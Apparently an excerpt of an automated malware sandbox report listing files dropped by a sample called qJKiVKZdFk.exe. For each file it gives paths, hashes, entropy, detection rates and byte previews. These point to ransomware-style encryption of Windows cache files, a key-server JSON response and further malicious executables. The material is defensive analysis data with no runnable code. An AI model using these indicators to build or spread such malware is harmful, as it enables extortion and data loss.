                                                                                                                                      Preview:CMMM ...5j.J..t..!.>..^{.,..t..c:...>|M..6}.}.J...8..V.*lEF.5.)...S.......^...s...{]^.....G..y..6.$...'./.......#... e...Z".....t".o..UJ3...4^.....Y....q..4....).Bvo.....G.e/..)wS.2R>..N...j;9.^.y.x.C..a?L.._|......U.....|......s!.Qpp.......@...AF.....6W...x..S.'.@=..Ttp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_exif.db

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):358
                                                                                                                                      Entropy (8bit):7.2225238631467645
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:hGoxxuef2BFDabyc8LjlU7IEAOXpEaYSRItCIErG0Wl3ukIcii96Z:IoxxJfQpF6IEzX5YSMCIESFukIcii9a
                                                                                                                                      MD5:5A5BE70B095F20F670B5B894F5339E88
                                                                                                                                      SHA1:CD637C73BF66ABAC64F9EC958DB14D77BC50D405
                                                                                                                                      SHA-256:7630FDB69152325E1E0498B5E97647B95B1A8942BF91979A04D368F1BACF14B5
                                                                                                                                      SHA-512:20BF4E938726E216FCFE02DC16731E792B5C5AACE41B3572D6EEBD8B0FA72FF3F4E1883BB394073F5151AC4494E8BD6C913389BB0DBCFDFEAD85C20824EF07A9
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:CMMM M..kK....."........j..0.doT....BH...=.d'/...Z....`.y.?..j.,t%....G..w..:...t.?.,]....y. >.{)..m.y).....'....s.....}.....Nv.!..cwE...Y.B.D..M-....4<.m..*...K'.2..t....' ...A.*.....4_..=.d....:..>.}>..Tr.wQ....$..ph..y>..?..Ub.\..T...7.....H<...!b.~.Gy...s.q...tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_sr.db

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):358
                                                                                                                                      Entropy (8bit):7.24649876624867
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:QAcZ+LUy3AKeutMioA73WomeefGkmdM1PCZEpq4+du3ukIcii96Z:VjLp3JmizGos+/OFCZANi+ukIcii9a
                                                                                                                                      MD5:DEA6D491DAFC594A06164072225D9B45
                                                                                                                                      SHA1:B78A59CAD0E76DA312144FDFC7C3E58624882029
                                                                                                                                      SHA-256:BE18DAA60BDA10C5319ED7E67CF87D5CB23721358ED997CEA2FB8B3B4BA77B25
                                                                                                                                      SHA-512:7EAA7644A132C5BC91FDB0F3A9162393BBE51B31248FB582C625D4DE67A1C6985F4DB2A7CB1FDD2B72132B73AAC83B443AA4F9F271BD50C8F66AA456A51CC322
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:CMMM N N...h.w.9!'J%...%.....(..}.<[..s...c."..H...R..V....d...V._."..>.......Y"T=...iz)N.d..^^96.z...f.=..qF..Lt.......jJ...c*..S..\+..d...p Z._Q...3t.*.&..'..0W.u.....;.k\.......q.......et$..&0m.^.88j>.as[..i.g.w........*.Y()....aFc'..+.........{.q..w.P@....^..\e.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_wide.db

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):358
                                                                                                                                      Entropy (8bit):7.316062096158001
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:mJWMWTmFtOxAKLfvc7cbr9LJ64FGv1AEFx1IhqlolPv3r43ukIcii96Z:mYMSytORLf5brX61AcxCCWPzYukIciik
                                                                                                                                      MD5:E67F5235B1726986EBCD05883CC14549
                                                                                                                                      SHA1:B045457648CFCCCBD7B53F24B486D995C4B1805D
                                                                                                                                      SHA-256:B7D4ADF5174D03C24878A19A52EA97E93BD43D618085CE016968CCB184FACCC6
                                                                                                                                      SHA-512:AAB6F2E3B01E1D7CE239FE29621D4FABA2CF91C50BA2936B4EF298DADEF4016797C84C2A82C083D6637E50B964BADD60C0F8F6E46B38049CBF71BACE9A12C1D0
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:CMMM A:Ex..i..A.ul......{........t./:B#c...^......w.....Y..K. X....x.N=...>pH...!G..~e_..,...'./XU<&9..D..%}pgk...Y......R...P..-#...Y..r..*y...x.H.>...L. tW.uj.I..Aj.4...i.,.y....5.1.....F.EN..>....3x..X{..t.:...[HAd....}.....9.Q..:...2..5.a8T..B]0...;RP...ii.9.rp......tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_wide_alternate.db

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):358
                                                                                                                                      Entropy (8bit):7.280478646238559
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:hjNEBXbSxAdlIm8TFWYoL6B1bqo7meUe8vG9tMT2CmS8WX5cnS33ukIcii96Z:hhE1Sx+fiyL6fi+ZnfW5ukIcii9a
                                                                                                                                      MD5:91FC6E73FFF2F256812EEC15F480E491
                                                                                                                                      SHA1:2180FF7286557DA400B0933F07CC70C813BD3058
                                                                                                                                      SHA-256:6039F70D88EB7B10A3AF7F86670EDF7F05FD849110A424A8FC99E01066683D3D
                                                                                                                                      SHA-512:7E026168EA7F02DF0EC483DABF29B7DD62F082FB0B2E710307E140F2AB437F9CA768B3265EFB3A219E6F19571817DF3B0BBCB24F7099FAFAFE724288368EF81A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:CMMM jjD..4.{.....B.~.'.\j.G.0X&...r.P"....e..H.N....w....-...!.2......7.D....O....i.l.e..13.mS]+.q....k..O.X.2....$5.~j.....T.A.!av.+..G.....`..{!..=g.K....=.RhB...5......)....=....T.T.^D..p....b.vS....$~.b.1.....<8.6~n...@H.c?.|`....M.gq...p=.....O...W.4C. i..v.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\76561199673019888[1].htm

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):34124
                                                                                                                                      Entropy (8bit):7.995183658488271
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:768:ESeSW3EBb4WShGRP8W255f0KjSCFTzuCwVT1jBnkU+rM37dvu:OW8GR0W2xuCJzuCET1jFk727Vu
                                                                                                                                      MD5:220BB25610E0796B89BAC279BB713FFD
                                                                                                                                      SHA1:771B9BCD065EE22C5B1003B8A1D615CF0DA16162
                                                                                                                                      SHA-256:F6555BC588C8A9E9069C9D7E2348DEF93F34F578E9065548E533D65F5EB319D6
                                                                                                                                      SHA-512:B956733DBC9FBCA01C9322457D060CE4FC3DB359BB595D373386743667D14CB0DF7A68DEB1400E087E929FC512B057875175CDFFD6FA468F1E95094331CD5AFE
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:<!DOC.....#{+.!.-..@.Z......wj.8..... .2..h?..fg...y......_.//Sn~...Ei...0.........A!..O$..(........f....Z1.W3e.q....6f...\W^A.I.......M.^:.5{U.r....~....4..eQH...[..fad.c.5..MBV....XQK.a...;....L...0....d.=.<.K?...._7.<p52L.?......H...w..t.x....*..apn....7C.-!.w.Uv..;...w.}...o...(.,..U.0cg!..^...3/w..?r../...........R..z>....W..X...."O.2F......U...)..-..(.9.G.....B..b.P..6..{.\.-..Y...[N cT.@...5..F.4Y&...Yk.[k..E...........U..9B...j...M.v......%O'tM6c...W.e....[........Q..$..<..qdcn.O..>..9.....d".{.27eZY.,..2.8..!...w....n.".!.q+t3.....E..j.o.X.z_.....HS>.9.v.(..+O....,4....&<...5.mO......k.._...g.v....w.>......Y((....O..-..Cj.ba..]..Pf.>.9K]t.....A....t4...V)W.iul....eQ...>;.....H...&........e......I.4,F]..&...*>..L>}7..........30w7$......Ur._.Qj.."Wq.v5....1.A.EX........p;..g.+.._..._B@.2c..3..P.OA".v;=.>....H.s.:.*@.L..27.839.a......M......{Q..,/..@.M../u}.+..Pd.W......$M..2....s.?.BS0.E.S..6O....@.FZi.U..b*..U.\...MX...@...O)

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\build2[1].exe

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):296448
                                                                                                                                      Entropy (8bit):6.701097338503782
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:QOKV/JhkCZrraOTzo+fGN2ZDFlYJ0YeA4Mcjv3SSyrqwLIY7Ni1KfqbdonRMIIyZ:uXtPJoqYYZCBVIYA6iQeIL8E
                                                                                                                                      MD5:A04031208441077A014F42095FF86107
                                                                                                                                      SHA1:DE1506EB54B9947B4DE069C87BB1103BF17A08ED
                                                                                                                                      SHA-256:9B0DA8AB12D9CA7CC05B9553BA3D3407E4EE38CB9A74298096022B2B46563FB2
                                                                                                                                      SHA-512:851741FD1856058C4C759392CAE2D4694E05A9E7098B8E50FCCC601BD588FF0C92DCDB577D7937E7D4C73879394803B13D2F1EACD72488B0D3C3C226929B81C6
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 74%
                                                                                                                                      Joe Sandbox View:
                                                                                                                                      • Filename: 8jvTeVxooN.exe, Detection: malicious, Browse
                                                                                                                                      • Filename: 3CB27VUHRg.exe, Detection: malicious, Browse
                                                                                                                                      • Filename: AaIo4VGgvO.exe, Detection: malicious, Browse
                                                                                                                                      • Filename: 8xFzJWrEIa.exe, Detection: malicious, Browse
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................o.....P......Q.....#...........?)U.....k....?)n....Rich....................PE..L...G..c.....................0`.....m@............@..........................0a..............................................j..d....@`.f...............................8...........................@`..@............................................text............................... ..`.rdata..Pt.......v..................@..@.data....^......6...`..............@....rsrc...f....@`.....................@..@........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\get[1].htm

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      File Type:JSON data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):560
                                                                                                                                      Entropy (8bit):5.995520112113063
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:YGZPTaBZN7Qg8zhfzFY/fy6k/QenH+hQALwMJBJ0gZE7N7fV7hBzSfH6uF0ZIAxl:YGJ68hffYQ+C2weB2gWPzs6a2x+58d
                                                                                                                                      MD5:5B9C1A67229D601AE777836C962A6335
                                                                                                                                      SHA1:D0877A363CA9727966BB57C2F48D433EAD509405
                                                                                                                                      SHA-256:CF8877BDC45427B4650BF567A2338DF26F489B9A4D963793A60DFB921B3CE7F2
                                                                                                                                      SHA-512:5805A7D0DAF851FD9640C77763115D8E50F628BB5CB94DA326ADD489C6E97943CDDB5244B98FAD6B00D8C49CF7A8BE4614B5BBEC9BE6BF9D21B05370E5751C86
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{"public_key":"-----BEGIN&#160;PUBLIC&#160;KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA9TLHfuwgL1EtGNw\/w5eV\\nWD5bVX7I4cOUSxyG7YpbAlG6kOpdBiNnZNaw3o0u7wTyOFhL1nuapc8slWn82lHn\\nbvxMZujUIAxujWHz2gUbptx3FLpNutAbyett\/0L6xzEMXFmg126vYM+\/vesY1SSB\\nPxEsNG5LmHT3grWBeYX\/gYouGbz8OoLTj2HYfU2dQ35Z0D6kICwFghIUDaiHlB+1\\nqQ5q\/FZdQlzkFIhimqtbS+HbzpJB4dnIF\/TD9iNmFWJwjyAjaJjfdV1npllllYLK\\n3lHt4qRVdUfJBn0puzHB218fzdgcivOuvxzrBR9zm8vj45HmdquPQv5T8abYGYIn\\nXwIDAQAB\\n-----END&#160;PUBLIC&#160;KEY-----\\n","id":"tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT"}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\sqln[1].dll

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exe
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2459136
                                                                                                                                      Entropy (8bit):6.052474106868353
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:49152:WHoJ9zGioiMjW2RrL9B8SSpiCH7cuez9A:WHoJBGqabRnj8JY/9
                                                                                                                                      MD5:90E744829865D57082A7F452EDC90DE5
                                                                                                                                      SHA1:833B178775F39675FA4E55EAB1032353514E1052
                                                                                                                                      SHA-256:036A57102385D7F0D7B2DEACF932C1C372AE30D924365B7A88F8A26657DD7550
                                                                                                                                      SHA-512:0A2D112FF7CB806A74F5EC17FE097D28107BB497D6ED5AD28EA47E6795434BA903CDB49AAF97A9A99C08CD0411F1969CAD93031246DC107C26606A898E570323
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Joe Sandbox View:
                                                                                                                                      • Filename: Z4CYGTBlj7.exe, Detection: malicious, Browse
                                                                                                                                      • Filename: SUwX12D2S6.exe, Detection: malicious, Browse
                                                                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                      • Filename: rq0mVjR9ar.exe, Detection: malicious, Browse
                                                                                                                                      • Filename: 8jvTeVxooN.exe, Detection: malicious, Browse
                                                                                                                                      • Filename: UXNob1Dp32.exe, Detection: malicious, Browse
                                                                                                                                      • Filename: mJVVW85CnW.exe, Detection: malicious, Browse
                                                                                                                                      • Filename: JfOWsh7v0r.exe, Detection: malicious, Browse
                                                                                                                                      • Filename: AaIo4VGgvO.exe, Detection: malicious, Browse
                                                                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........7.Z.Y.Z.Y.Z.Y...Z.n.Y...\..Y...]...Y...X.Y.Y.Z.X..Y.O.\.E.Y.O.].U.Y.O.Z.L.Y.l3].[.Y.l3Y.[.Y.l3..[.Y.l3[.[.Y.RichZ.Y.................PE..L...i.`e...........!...%.. .........{D........ ...............................%...........@...........................#..6....$.(.....$.......................$.....`.#.8...........................x.#.@.............$..............................text...G. ....... ................. ..`.rdata...".... ..$.... .............@..@.data...4|... $..b....#.............@....idata........$......^$.............@..@.00cfg........$......p$.............@..@.rsrc.........$......r$.............@..@.reloc..5.....$.......$.............@..B................................................................................................................................................................................................................

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Shell\DefaultLayouts.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):64281
                                                                                                                                      Entropy (8bit):7.996895760350316
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:768:51OXluEDAdsujOPtgDGXefqukmN3s2FO1QLzEJ/sgY1451uN84b3kKkKDXnMyGz7:5kBAiKDJumWSEFH4HzMyYNVmGgq
                                                                                                                                      MD5:9F3032582FEABCA9090DC2B8DF7AC0F0
                                                                                                                                      SHA1:B574A6D8B5B1990F7FB982F3B4CB6E1AACF9C2AC
                                                                                                                                      SHA-256:61843AFC77F145B4CF5D6E32BCE758924DD99E498CA05E6E425A09996A873FF5
                                                                                                                                      SHA-512:CC53A07046727BE0647B002929CB4F00797EDBFDE0C351C2C316EFF22F6E7C40ACB9ED131C690B5818458AB7742B2603ACB067936ACFEE2CC5AD7FE5ACEE1DF2
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:<?xmlO.Kd.'.N\,.8Z.%+r.*.G...W2.%o..i..N|..)...~.}.3..F4..B.z%).`N..N..II..^].1.+VS..q.W...X.3..%6 ZR...]0.uJ.qJB3Jj.yQ..6....K..'...rXW...v.....v....K...h.ekh...................V./eb.+.*.^iD.SG..X.z.. ..q..Wf..(C(=.m.T...Zc...Y........f.4N..Yvv...e..$\(....yQU.p......g....S....H.../B}./+X%.l..."...p...PgM.M0B...^.;~.jF?R.%..<hev.-;..3BQ.M .T..A...<..$...h...+....].l..v&.....!.....s.(....6.^ph.uHE..?]L....3U....4.8..fh..$../..po.!sP....:M...x.C.........W.^.-.g....^.."..|U.Hf.S(...!..&....x.;./..kX../.:_qB...b.z....d........::..1ke...).G.zZ..9Y..U$K.3....h<Y?.z..R..-.'..........-..y..?-.._7..).oZ(....%.^..q.. h.A.u.a:..+.....V.,;.....T..a_...rV...p.}...i.(...x..........I....Wb..V.\".....i.<.c.Q.....B.....Y1.x.V,1.....$..O!/...U.nF....s./..^...NZ.....+)Y....%=N.;...z....%..V..;.^;^&@.....Vu...y$...tno....N=E....P....F.'..rB....{@.C..s.`2...+ S..+...P.3.h........&.k.....f..v.;.6w..s..r...X..w..s!..r..e....Z.2...m7.^".,...?..9.......$T...J

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.chk

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.979889448990492
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:K3xhOY5tZRXIHytdJacmoSZgSjY48Yxx3quswueY6j:KBwY5tZRXoyTBRSb5xxAgj
                                                                                                                                      MD5:7F9CD241166817800BE30B6377FDD6C5
                                                                                                                                      SHA1:ECB314147416D26DEF3765E1C5029A1BF58C1934
                                                                                                                                      SHA-256:0801428DD6EAB2B60353BFA6D68E3E9A3ED3417D03CE39A43C94DC46E468475B
                                                                                                                                      SHA-512:681CC96AB783C5B95ED5C72C75741CE7097C42A73F60645AAD6471E6E17EA35854D7A8F6FA36175CA9DE3D48CB456E0008B19914616FC378B5AEDEB09A8DCC76
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.p.|...5.S...mqD.|b..tr.........1.v...&>..*..U.i..B..2Eg..j...AO..U.Y......k0c....8$R0.P....zB.x.u..w.Y%..j..]\...H?,...;.X....`.q.U.W....d..K.3/?Z]..z..!..iu...k.'..h?..V..!|...{....%.2'_...fV..x........u.Pt.@$l.I.r.... ..1...Vz`..P....wpG.o...=M7+..*..[e.n....*-u...$.......}r..|.}.c...m9.._L..3B&$....a_..!....P..m...P......i.....,..QB:.u..=...OY.u-.....u...&.~..X..PX..........[ja.....2..\..v..F.`R.......{...J.D...I^ZD.*.W....b.S.~6b-.....Q..R....cw..;..M...|....b7~k.6.U.N...../...u..6."....v.....600..^.W.=.E.7....N.........3..2...'.j.s\.......j...4.|.HJ...............i.(.".M.^T.Lln0..J.+L.C........V.p.....T.s.?....Z.:.(....t..o.}..B....N............3.w,....R.:...s....wzc8...*W}..Q...."..c.{RC;M:.m.p.r....'..yQ^8.....=0.o*....r_...XG.g....`X......s...[/Y.....2.K.&c....s...dg..-.\s..w..s.IU.{h....Z.....~#.#.......gu9_-..p... ...+."..-.$..RM.......2...%/o........uL.B6.z..P./...,...!a...E..Y.K...M._'#....}...GI.=.....^..=...R.\

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V0100004.log

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):524622
                                                                                                                                      Entropy (8bit):7.012213429418872
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:JqONnyg4QNn3uosOs+WZX2UvUZ56mwBJeQNy6tsM0P8ATX1BK8O2Jzy:UOsg4e91WZXQryyA
                                                                                                                                      MD5:5E902A952281405DFD38BB8893ADAE5C
                                                                                                                                      SHA1:4461814FDC5166FF68E5692836D453C91B318273
                                                                                                                                      SHA-256:C84AAD46446661971DC80A57AE5900FB898BCDAE7C2EA19E6A89A801C4CCE579
                                                                                                                                      SHA-512:CF40707C4C87805954886236567F3BD16BEB29C340DE347944973B357D00B7A2F1E49D1AAE13F9C7A44F442FB99F39C5EFA8DD1ACDECEA7D28352E4402FD433D
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:w.I`...?...n.^..o.#.%....o.tlK.%..s..YS...x2.g.|h.6^..H.%s.,|...x..}.[=.Yx.#...u'...Z..d....n..M....i.ly.u.G....;..(..x.E.Z..3.."...R;m..4F.k...?......V.8...k..3..(.C..<..2.8g..k.gG..M...........e}......>1.2.2@ ..z...{.+...I1.T.IU......'=g..+.5..1../.e..h.2.dI.M.A.WD..\I..I.`.fJ.q.nN....^-..'.1.RZ...j..y.+R+.....YN.-...&..|..DT...........}....=.s......ruE.N..!....^/.,.fo&.Y.7...c..`d..-t...i.@..)........n....g.z.....*/G99b......6..a...J.p3`dj/...;S_.t..(..j..}..+FT...n.!..U..D....k).d>Y.q;.w..4.w(...{.L.L.@abe.g...e......z...Ll.........X.=8_.KU..e..d....E.1..6.N.6:.H..t..a....#.<..@..C{.Y.......k...0M.C.+wuZ..R=L.....%UO..............!dX.;.....7]Vr2....'........v9...a..._..+.}....]`...x.r`C.y..8.........+..%x..Tf#.4..AC...D.J4.S.V.~E._...w.......x...f.96.~.2...(......_...n..d...Z*G.S6..B..j.......F.Q.,W.$....._.N....}u...._.r_.q.fgz....V.(Lc.&..)..+.Q.f.%....S....C1....9..R'L.r..p.1........N_...4..~.5"..X0..G..`9..>...a...+O&N..D...

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01res00001.jrs

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):524622
                                                                                                                                      Entropy (8bit):3.20852564083687
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:xgSqTMW9lduqSx5OHNyipA0txLnmSljgH+KS2EPrL87Y:uTpzuENyiLnmSCeKNE/L
                                                                                                                                      MD5:EA9AA1A75B819ADC3F3DE3E81DAD08F3
                                                                                                                                      SHA1:F1561BEF8EF68EA03B43A78231444AE6052856B3
                                                                                                                                      SHA-256:C01AD500CA5A391D8B0A58C7BE322D22933BFE6C2562A1F0523454099E97B7E9
                                                                                                                                      SHA-512:6BF17B768584AC2CD162E68B8073353F070CD20BB3841B19298225E65CCB5093AC1C2844285B79A7C62DE876D6EDB471DAE760DAE7886645C95A7C361519D1ED
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:......r..#k.dl.e.a.2s4sO..d.jN.M#...=..#...BL.q.F...QR..P..r..q."a.cl../.q$.....T...ct.z>.r&...YCI.....%D.E......<...H..V....q/*.......CO.....R..u..H<L.==`.....+.A&lZ."...{S..s>..q...]5m.7.l.x...W5..{H.U.,U....%....L.C.....(..m..V/.=6YO.d..~3L.g..Zdh...;lF?..O.>Hy..."._4..Q...^.../.a....).....oa%tV.....d;.G.c.S.O#.(.9)>L+srpf.9.....Q`.W.....;....?.y..0....:..\...1...>.{....Q..IgI.H<...'..:.g..p->..|+......lg.M........f..?%...K..qI#."E;.o$...&.. VJ...o.`..Fs...qX|.....8hq.B..3...."..s.u.x....i.....j@\... ...8.K&cry.I..N.R...J>.I.MD...3.t......y#..RL9.....,f.tR.11.Z..D....[}&....3W.....:P.B..:.fQ.H.._M.(.....<....O..h...<+......Aw....y.+.}..L5<.L<...........8...n)$,..6)..i...?U.|)R..$..8.......l.{ah..`.?K.t9N.......3..3....U.P.:....u...B.4h.I.m........`.........e.O'3CW?]....>g...~.$<\!...W@.....T....|..Jy-5..~...H..S...W..<].t......<."Z{....y...G.P@.9..!B..C)...z.B..i....-IW..m4...HH%u...Z...1T.8P..v.......T<.o....T......?..~[...*.

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01res00002.jrs

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):524622
                                                                                                                                      Entropy (8bit):3.208077766109632
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:LYZv3vdE9WAcBAAEhuiuPiwp6QVgzSC2bcOpvaXDi32cZUpapQ:Ls+WFyAEXuPzt9YOpGm32cZsapQ
                                                                                                                                      MD5:456E7B6F9CB20794874A4FF7B83D800B
                                                                                                                                      SHA1:E55E198861756E4FEA7BF1C77B2EC86A8C5B43E4
                                                                                                                                      SHA-256:A33BA52A38E51F16891D13429BAA128417D409EAE6520B432D10603EE0E6C742
                                                                                                                                      SHA-512:255D4B5A72EF0B85CE029CD28A76F6BAF57FABDF1C9301EA82F99B432266120F53AB9F9655BFF608885AB784348B2155A6EE2EE56E60F1FD756D2A3F9156469E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.....b......J:Y.`....?.._.....DL..2*O..M.s..>+*.B.X.%...xc..R.|..R.....Q.i-;......^.`..(....z......L%6...u,...RxZA...FW}.4.D...{6.LFKAn._....qa..-..!:.x>.......9..K.q..O/z....)f6d.e.E.O.ilA...Vs.a.2...}..b.U..h~wo=l{..#..Z..M..|;5.......g.D..8.7.9..;P._/...~7...7...Y...?.....H...g.Ib.W.6..u.X...989..<-,.|<...z.z.cF...rI.K...vZ.....5.>..g.j_'+........R.."...N7{9u.t....*/.._......o....-..qH...A......|...W..Z;..-.-[^g...H...Z"q.Z.E55v..NI..}3.d)ds|.-...8m....h.....)9b.o.f..[.x$CP."..t....X.... vH..61.J#[jA.,A*',"f.....v.x..N....<.w....h.\@....~........'....X..a..:..{.Xe.yyB......4..Fd...Y]..b.Dc..l.n.N.}Uw....!.3.....HPd...$E.c?...\.......lE...8.....*....=.........h.....&D...1.....4._)a..s.a...e].I..%[O(...Y..........z7L0q.x....x.tO7..8.~..eI.....,;.W~e..=.60c..PRh....,6_.&A<.3>F.l.4)...+.`......R....."ZRaV......+:.v.-...}..h...:....J.;.h[.@.5a...l.V%f....-.o.IK..*.....-.[.0..`:cq..k...v...1.?..Z..HaK.....n5..x.l......Oy.{.~{...I.@.y.d!m7^......8..

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01tmp.log

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):524622
                                                                                                                                      Entropy (8bit):6.6646380308826805
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:xYnSgF9htUoB6zefK8HNzGwOfLK0eBQ6GuwlcTKcBwqGQguuleoxvTxcZxBvxdhr:xYnxB/K8HNzGwOfuglttEjxz
                                                                                                                                      MD5:4FEC1BE6BB61305E1B461C55FBD463E6
                                                                                                                                      SHA1:625B52E5FC39847BCB1564AF4629B1795D330A7E
                                                                                                                                      SHA-256:CF26878168B594326966B00FFC5B89212D66D499FE4E533AE99DC2C510E5DF0F
                                                                                                                                      SHA-512:532C54FFFFD75EEDABAC6918727AE2A8EE9E3CDEBE7A08315653B7EFDA05CD3F0293B63E8F409263953530629D00451F62E708E7E69EEAF1E41CDC919B6566F7
                                                                                                                                      Malicious:false
